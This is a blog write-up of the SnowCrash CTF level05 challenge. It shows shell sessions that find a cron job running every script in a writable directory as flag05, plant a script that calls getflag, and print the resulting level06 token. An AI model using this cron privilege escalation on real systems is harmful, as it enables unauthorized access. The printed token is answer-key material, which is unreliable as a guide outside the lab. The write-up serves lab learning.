Blog
projects
snowcrash
level05
Writeup

SnowCrash Mission: Flag05

Objective: Retrieve the Level06 token to advance further in the SnowCrash challenge.

Once logged in the system prompt to us the following msg "You have a new mail."

[~]$ ssh level05@10.12.177.116 -p 4242
	   _____                      _____               _
	  / ____|                    / ____|             | |
	 | (___  _ __   _____      _| |     _ __ __ _ ___| |__
	  \___ \| '_ \ / _ \ \ /\ / / |    | '__/ _` / __| '_ \
	  ____) | | | | (_) \ V  V /| |____| | | (_| \__ \ | | |
	 |_____/|_| |_|\___/ \_/\_/  \_____|_|  \__,_|___/_| |_|

  Good luck & Have fun

          10.12.177.116
level05@10.12.177.116's password:
You have new mail.

After we execute the find command to look for related files to level05

level05@SnowCrash:~$ find / -name level05 2>/dev/null
/var/mail/level05
/rofs/var/mail/level05
level05@SnowCrash:~$

We get the /var/mail/level05 which indicate that a running conjob is executing the script /usr/sbin/openarenaserver as flag05 user

level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
level05@SnowCrash:~$

Now looking the source code of the script it's obvious that it's looping through all files in /opt/openarenaserver folder and execute them with bash as follow

level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
 
for i in /opt/openarenaserver/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
level05@SnowCrash:~$

Now let's try to add a script called flag in /opt/openarenaserver executing getflag command. We wait 2 min and check for /opt/openarenaserver/flag file.

level05@SnowCrash:/opt/openarenaserver$ echo "whoami > /opt/openarenaserver/works" > cmd
level05@SnowCrash:/opt/openarenaserver$ ls
cmd
level05@SnowCrash:/opt/openarenaserver$ echo "getflag > /opt/openarenaserver/flag" > flash
level05@SnowCrash:/opt/openarenaserver$ ls
level05@SnowCrash:/opt/openarenaserver$ cat flag
Check flag.Here is your token : viuaaale9huek52boumoomioc
level05@SnowCrash:/opt/openarenaserver$ cat works
flag05
WriteupWriteup